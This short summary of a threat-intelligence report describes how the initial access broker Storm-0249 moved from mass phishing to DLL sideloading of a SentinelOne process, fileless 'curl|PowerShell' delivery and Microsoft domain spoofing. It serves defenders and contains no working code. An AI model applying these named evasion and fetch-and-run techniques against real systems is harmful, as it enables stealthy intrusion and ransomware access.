Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation

ReliaQuest details how the initial access broker Storm-0249 has shifted from mass phishing to precision attacks that weaponize trusted processes (notably SentinelOne's SentinelAgentWorker.exe) via DLL sideloading, fileless PowerShell delivery (curl|PowerShell), and Microsoft domain spoofing to establish persistent, hard-to-detect footholds and broker access to ransomware affiliates; the report includes TTP mappings, IOCs (hashes, domains, IPs), and recommended detections and automated response playbooks.